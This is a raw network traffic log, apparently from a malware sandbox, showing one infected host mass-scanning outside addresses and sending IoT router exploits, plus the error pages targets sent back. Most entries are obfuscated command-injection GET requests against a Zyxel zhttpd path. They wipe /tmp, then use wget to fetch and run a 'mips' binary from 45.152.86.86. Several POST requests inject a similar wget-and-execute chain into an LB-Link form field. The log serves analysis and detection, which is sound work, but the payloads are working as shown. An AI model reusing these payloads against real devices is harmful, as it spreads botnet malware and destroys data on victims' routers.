                              8613192.168.2.1353188211.8.126.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362793922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8614192.168.2.1357782171.224.227.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362849951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8615192.168.2.135628269.5.120.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362895966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8616192.168.2.1354906156.38.28.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362946033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8617192.168.2.1336602211.228.226.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362960100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8618192.168.2.1337156139.33.102.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362967014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8619192.168.2.1343074217.28.164.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363018036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8620192.168.2.1335472177.73.219.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363068104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8621192.168.2.1333322121.244.244.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363121033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8622192.168.2.134181063.207.196.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363147020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8623192.168.2.1355266133.81.82.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363209009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8624192.168.2.1344036189.22.135.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363245010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8625192.168.2.133834257.99.105.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363308907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8626192.168.2.1352158143.130.235.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363357067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8627192.168.2.135297477.9.248.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363399982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8628192.168.2.135429689.20.46.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363432884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8629192.168.2.1346272195.167.196.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363490105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8630192.168.2.1355944181.254.4.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363528967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8631192.168.2.1345326101.45.125.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363584995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8632192.168.2.133432289.235.99.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363636971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8633192.168.2.134746476.118.141.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363684893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8634192.168.2.1349218206.57.191.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363692999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8635192.168.2.1342452193.73.178.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363728046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8636192.168.2.1343684209.207.21.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363759995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8637192.168.2.1358302149.79.93.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363815069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8638192.168.2.1358010114.88.247.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363847017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8639192.168.2.1339966183.205.90.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363902092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8640192.168.2.1341458115.117.29.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363953114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8641192.168.2.1359842216.49.137.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.363965034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8642192.168.2.1355758112.43.252.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.364520073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8643192.168.2.133638884.141.48.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.364655972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8644192.168.2.133671631.131.243.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.364685059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8645192.168.2.1339774180.146.218.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.364722013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8646192.168.2.135985654.103.249.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.364753962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8647192.168.2.1332814172.66.3.18080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.493884087 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:09.588223934 CEST328INHTTP/1.1 400 Bad Request
                              Server: cloudflare
                              Date: Sun, 31 Mar 2024 06:42:09 GMT
                              Content-Type: text/html
                              Content-Length: 155
                              Connection: close
                              CF-RAY: -
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              8648192.168.2.1336898183.230.101.708080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.831962109 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:10.272691011 CEST303INHTTP/1.1 400 Bad Request
                              Server: openresty
                              Date: Sun, 31 Mar 2024 06:42:10 GMT
                              Content-Type: text/html
                              Content-Length: 154
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              8649192.168.2.135019664.253.83.2548080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:10.118321896 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:10.468067884 CEST321INHTTP/1.1 400 Bad Request
                              Server: nginx/1.20.1
                              Date: Sun, 31 Mar 2024 06:38:04 GMT
                              Content-Type: text/html
                              Content-Length: 157
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              8650192.168.2.1343734196.51.222.1878080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:10.284284115 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:10.450459003 CEST1286INHTTP/1.1 400 Bad Request
                              Server: squid/3.5.20
                              Mime-Version: 1.0
                              Date: Sun, 31 Mar 2024 07:29:00 GMT
                              Content-Type: text/html;charset=utf-8
                              Content-Length: 3469
                              X-Squid-Error: ERR_INVALID_URL 0
                              Connection: close
                              Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                              Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')


                              Session IDSource IPSource PortDestination IPDestination Port
                              8651192.168.2.1352004202.187.205.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:10.378629923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8652192.168.2.1341306186.47.44.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:10.390794039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8653192.168.2.133752093.76.92.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404546976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8654192.168.2.1354236104.104.138.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.404583931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8655192.168.2.133305841.243.198.217443
                              TimestampBytes transferredDirectionData
